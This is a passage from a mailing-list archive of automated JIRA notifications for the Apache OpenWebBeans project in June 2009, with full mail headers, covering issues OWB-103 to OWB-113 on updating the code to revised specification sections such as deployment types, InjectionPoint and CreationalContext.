specification. It affects lots of the code. I still want to support DeploymentType in OWB, because it is really beneficial. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jun 20 11:12:20 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41888 invoked from network); 20 Jun 2009 11:12:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2009 11:12:20 -0000 Received: (qmail 34925 invoked by uid 500); 20 Jun 2009 11:12:31 -0000 Delivered-To: [email protected] Received: (qmail 34894 invoked by uid 500); 20 Jun 2009 11:12:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 34851 invoked by uid 99); 20 Jun 2009 11:12:31 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 11:12:31 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 11:12:28 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 57B87234C004 for <[email protected]>; Sat, 20 Jun 2009 04:12:07 -0700 (PDT) Message-ID: <1175238363.1245496327345.JavaMail.jira@brutus> Date: Sat, 20 Jun 2009 04:12:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-106) Update code for new deployment type handling. MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Update code for new deployment type handling. --------------------------------------------- Key: OWB-106 URL: https://issues.apache.org/jira/browse/OWB-106 Project: OpenWebBeans Issue Type: Task Reporter: Gurkan Erdogdu Assignee: Gurkan Erdogdu Deployment types are removed from the specification. It affects lots of the code. I still want to support DeploymentType in OWB, because it is really beneficial. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jun 20 11:18:18 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 42559 invoked from network); 20 Jun 2009 11:18:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2009 11:18:18 -0000 Received: (qmail 36256 invoked by uid 500); 20 Jun 2009 11:18:30 -0000 Delivered-To: [email protected] Received: (qmail 36237 invoked by uid 500); 20 Jun 2009 11:18:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 36227 invoked by uid 99); 20 Jun 2009 11:18:29 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 11:18:29 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 11:18:27 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id B134B234C004 for <[email protected]>; Sat, 20 Jun 2009 04:18:07 -0700 (PDT) Message-ID: <1445182445.1245496687711.JavaMail.jira@brutus> Date: Sat, 20 Jun 2009 04:18:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-107) Check EL Name Ambigious MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Check EL Name Ambigious ----------------------- Key: OWB-107 URL: https://issues.apache.org/jira/browse/OWB-107 Project: OpenWebBeans Issue Type: Task Components: Injection and Lookup Affects Versions: M2 Reporter: Gurkan Erdogdu Assignee: Gurkan Erdogdu Fix For: M3 check section 5.4.1 -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jun 20 11:36:18 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45436 invoked from network); 20 Jun 2009 11:36:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2009 11:36:18 -0000 Received: (qmail 42292 invoked by uid 500); 20 Jun 2009 11:36:29 -0000 Delivered-To: [email protected] Received: (qmail 42267 invoked by uid 500); 20 Jun 2009 11:36:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 42257 invoked by uid 99); 20 Jun 2009 11:36:29 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 11:36:29 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 11:36:27 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 8C786234C004 for <[email protected]>; Sat, 20 Jun 2009 04:36:07 -0700 (PDT) Message-ID: <154481188.1245497767567.JavaMail.jira@brutus> Date: Sat, 20 Jun 2009 04:36:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-108) Update InjectionPoint interface MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Update InjectionPoint interface ------------------------------- Key: OWB-108 URL: https://issues.apache.org/jira/browse/OWB-108 Project: OpenWebBeans Issue Type: Improvement Components: Injection and Lookup Affects Versions: M2 Reporter: Gurkan Erdogdu Assignee: Gurkan Erdogdu Fix For: M3 Update InjectionPoint interface, see section 5.6.9 -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jun 20 11:38:24 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45630 invoked from network); 20 Jun 2009 11:38:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2009 11:38:20 -0000 Received: (qmail 42510 invoked by uid 500); 20 Jun 2009 11:38:31 -0000 Delivered-To: [email protected] Received: (qmail 42484 invoked by uid 500); 20 Jun 2009 11:38:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 42473 invoked by uid 99); 20 Jun 2009 11:38:31 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 11:38:31 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 11:38:28 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id A0CFD234C004 for <[email protected]>; Sat, 20 Jun 2009 04:38:07 -0700 (PDT) Message-ID: <1396104514.1245497887654.JavaMail.jira@brutus> Date: Sat, 20 Jun 2009 04:38:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-109) Update Instance Interface MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Update Instance Interface ------------------------- Key: OWB-109 URL: https://issues.apache.org/jira/browse/OWB-109 Project: OpenWebBeans Issue Type: Improvement Reporter: Gurkan Erdogdu Assignee: Gurkan Erdogdu See section 5.7.1 -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jun 20 11:42:25 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 46987 invoked from network); 20 Jun 2009 11:42:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2009 11:42:25 -0000 Received: (qmail 47142 invoked by uid 500); 20 Jun 2009 11:42:36 -0000 Delivered-To: [email protected] Received: (qmail 47115 invoked by uid 500); 20 Jun 2009 11:42:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 47105 invoked by uid 99); 20 Jun 2009 11:42:36 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 11:42:36 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 11:42:28 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 64009234C004 for <[email protected]>; Sat, 20 Jun 2009 04:42:07 -0700 (PDT) Message-ID: <264499828.1245498127397.JavaMail.jira@brutus> Date: Sat, 20 Jun 2009 04:42:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (OWB-109) Update Instance Interface In-Reply-To: <1396104514.1245497887654.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-109?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu updated OWB-109: ------------------------------- Component/s: Injection and Lookup Affects Version/s: M2 Fix Version/s: M3 > Update Instance Interface > ------------------------- > > Key: OWB-109 > URL: https://issues.apache.org/jira/browse/OWB-109 > Project: OpenWebBeans > Issue Type: Improvement > Components: Injection and Lookup > Affects Versions: M2 > Reporter: Gurkan Erdogdu > Assignee: Gurkan Erdogdu > Fix For: M3 > > > See section 5.7.1 -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jun 20 11:46:18 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 47226 invoked from network); 20 Jun 2009 11:46:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2009 11:46:18 -0000 Received: (qmail 48436 invoked by uid 500); 20 Jun 2009 11:46:30 -0000 Delivered-To: [email protected] Received: (qmail 48411 invoked by uid 500); 20 Jun 2009 11:46:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 48378 invoked by uid 99); 20 Jun 2009 11:46:30 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 11:46:29 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 11:46:27 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id D9E22234C1E9 for <[email protected]>; Sat, 20 Jun 2009 04:46:07 -0700 (PDT) Message-ID: <1028821954.1245498367891.JavaMail.jira@brutus> Date: Sat, 20 Jun 2009 04:46:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (OWB-105) Improve Injection Resolver for Generic Classes In-Reply-To: <707204225.1245494767799.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-105?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu updated OWB-105: ------------------------------- Component/s: Injection and Lookup Affects Version/s: M2 Fix Version/s: M3 > Improve Injection Resolver for Generic Classes > ---------------------------------------------- > > Key: OWB-105 > URL: https://issues.apache.org/jira/browse/OWB-105 > Project: OpenWebBeans > Issue Type: Improvement > Components: Injection and Lookup > Affects Versions: M2 > Reporter: Gurkan Erdogdu > Assignee: Gurkan Erdogdu > Fix For: M3 > > > Generic type resolution is added. Add support for generic types. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jun 20 11:46:18 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 47224 invoked from network); 20 Jun 2009 11:46:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2009 11:46:18 -0000 Received: (qmail 48395 invoked by uid 500); 20 Jun 2009 11:46:30 -0000 Delivered-To: [email protected] Received: (qmail 48368 invoked by uid 500); 20 Jun 2009 11:46:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 48358 invoked by uid 99); 20 Jun 2009 11:46:29 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 11:46:29 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 11:46:27 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id B6986234C004 for <[email protected]>; Sat, 20 Jun 2009 04:46:07 -0700 (PDT) Message-ID: <252020481.1245498367732.JavaMail.jira@brutus> Date: Sat, 20 Jun 2009 04:46:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (OWB-103) Inconsistent Specialization Extra Check For Injection Points In-Reply-To: <1392119015.1245493927878.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-103?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu updated OWB-103: ------------------------------- Component/s: Core Affects Version/s: M2 Fix Version/s: M3 > Inconsistent Specialization Extra Check For Injection Points > ------------------------------------------------------------ > > Key: OWB-103 > URL: https://issues.apache.org/jira/browse/OWB-103 > Project: OpenWebBeans > Issue Type: Improvement > Components: Core > Affects Versions: M2 > Reporter: Gurkan Erdogdu > Assignee: Gurkan Erdogdu > Fix For: M3 > > > Section 4.3.3 > Suppose an enabled bean X directly specializes a second bean Y. If either: > there is an injection point that matches Y and not X, according to the typesafe resolution algorithm defined in Sec- > tion 5.3, "Typesafe resolution", > Also DeploymentType precedence requirement has gone. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jun 20 11:46:22 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 47235 invoked from network); 20 Jun 2009 11:46:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2009 11:46:22 -0000 Received: (qmail 48482 invoked by uid 500); 20 Jun 2009 11:46:31 -0000 Delivered-To: [email protected] Received: (qmail 48455 invoked by uid 500); 20 Jun 2009 11:46:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 48445 invoked by uid 99); 20 Jun 2009 11:46:31 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 11:46:31 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 11:46:28 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id D4EAD234C1E6 for <[email protected]>; Sat, 20 Jun 2009 04:46:07 -0700 (PDT) Message-ID: <1842672276.1245498367871.JavaMail.jira@brutus> Date: Sat, 20 Jun 2009 04:46:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (OWB-104) Check Inherited Member for producer methods and fields In-Reply-To: <1129867611.1245494647408.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-104?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu updated OWB-104: ------------------------------- Component/s: Core Affects Version/s: M2 Fix Version/s: M3 > Check Inherited Member for producer methods and fields > ------------------------------------------------------ > > Key: OWB-104 > URL: https://issues.apache.org/jira/browse/OWB-104 > Project: OpenWebBeans > Issue Type: Improvement > Components: Core > Affects Versions: M2 > Reporter: Gurkan Erdogdu > Assignee: Gurkan Erdogdu > Fix For: M3 > > > Producer method and producer field creation is define in class DefinitionUtil. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jun 20 11:52:21 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 47631 invoked from network); 20 Jun 2009 11:52:21 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2009 11:52:21 -0000 Received: (qmail 49553 invoked by uid 500); 20 Jun 2009 11:52:31 -0000 Delivered-To: [email protected] Received: (qmail 49525 invoked by uid 500); 20 Jun 2009 11:52:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 49515 invoked by uid 99); 20 Jun 2009 11:52:31 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 11:52:31 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 11:52:28 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id B43AD234C004 for <[email protected]>; Sat, 20 Jun 2009 04:52:07 -0700 (PDT) Message-ID: <(856)577-9584.1245498727723.JavaMail.jira@brutus> Date: Sat, 20 Jun 2009 04:52:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-110) Update Creational Context Interface MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Update Creational Context Interface ----------------------------------- Key: OWB-110 URL: https://issues.apache.org/jira/browse/OWB-110 Project: OpenWebBeans Issue Type: Improvement Components: Context and Scopes Affects Versions: M2 Reporter: Gurkan Erdogdu Assignee: Gurkan Erdogdu Fix For: M3 Update creational context interface and its usage. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jun 20 12:08:18 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 55682 invoked from network); 20 Jun 2009 12:08:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2009 12:08:18 -0000 Received: (qmail 63595 invoked by uid 500); 20 Jun 2009 12:08:29 -0000 Delivered-To: [email protected] Received: (qmail 63567 invoked by uid 500); 20 Jun 2009 12:08:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 63557 invoked by uid 99); 20 Jun 2009 12:08:29 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 12:08:29 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 12:08:27 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 5444A234C004 for <[email protected]>; Sat, 20 Jun 2009 05:08:07 -0700 (PDT) Message-ID: <2091071401.1245499687331.JavaMail.jira@brutus> Date: Sat, 20 Jun 2009 05:08:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-111) Update Contextual Interface MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Update Contextual Interface --------------------------- Key: OWB-111 URL: https://issues.apache.org/jira/browse/OWB-111 Project: OpenWebBeans Issue Type: Improvement Affects Versions: M2 Reporter: Gurkan Erdogdu Assignee: Gurkan Erdogdu Fix For: M3 destroy method takes extra CreationalContext instance -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jun 20 12:12:20 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 56319 invoked from network); 20 Jun 2009 12:12:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2009 12:12:20 -0000 Received: (qmail 65588 invoked by uid 500); 20 Jun 2009 12:12:31 -0000 Delivered-To: [email protected] Received: (qmail 65562 invoked by uid 500); 20 Jun 2009 12:12:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 65552 invoked by uid 99); 20 Jun 2009 12:12:31 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 12:12:31 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 12:12:28 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 54AA2234C004 for <[email protected]>; Sat, 20 Jun 2009 05:12:07 -0700 (PDT) Message-ID: <450129579.1245499927331.JavaMail.jira@brutus> Date: Sat, 20 Jun 2009 05:12:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-112) Check Usage of Creational Context MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Check Usage of Creational Context --------------------------------- Key: OWB-112 URL: https://issues.apache.org/jira/browse/OWB-112 Project: OpenWebBeans Issue Type: Improvement Affects Versions: M2 Reporter: Gurkan Erdogdu Assignee: Gurkan Erdogdu Fix For: M3 CreationalContext interface is used for reducing a creating a bean proxy. But we always create a proxy for handling interceotor and decorator calling. It seems to be useless in our case. Specification also does not mandate using it. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jun 20 12:16:19 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 58359 invoked from network); 20 Jun 2009 12:16:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2009 12:16:18 -0000 Received: (qmail 70516 invoked by uid 500); 20 Jun 2009 12:16:29 -0000 Delivered-To: [email protected] Received: (qmail 70496 invoked by uid 500); 20 Jun 2009 12:16:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 70486 invoked by uid 99); 20 Jun 2009 12:16:29 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 12:16:29 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 12:16:27 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id AE520234C004 for <[email protected]>; Sat, 20 Jun 2009 05:16:07 -0700 (PDT) Message-ID: <989520337.1245500167709.JavaMail.jira@brutus> Date: Sat, 20 Jun 2009 05:16:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-113) Dependent Context Active State MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Dependent Context Active State ------------------------------ Key: OWB-113 URL: https://issues.apache.org/jira/browse/OWB-113 Project: OpenWebBeans Issue Type: Improvement Components: Context and Scopes Affects Versions: M2 Reporter: Gurkan Erdogdu Assignee: Gurkan Erdogdu Fix For: M3 Specification removes constraints on dependent context active state. It states that dependent contexts are always active. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jun 20 12:36:18 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 75914 invoked from network); 20 Jun 2009 12:36:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2009 12:36:18 -0000 Received: (qmail 83696 invoked by uid 500); 20 Jun 2009 12:36:30 -0000 Delivered-To: [email protected] Received: (qmail 83670 invoked by uid 500); 20 Jun 2009 12:36:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: 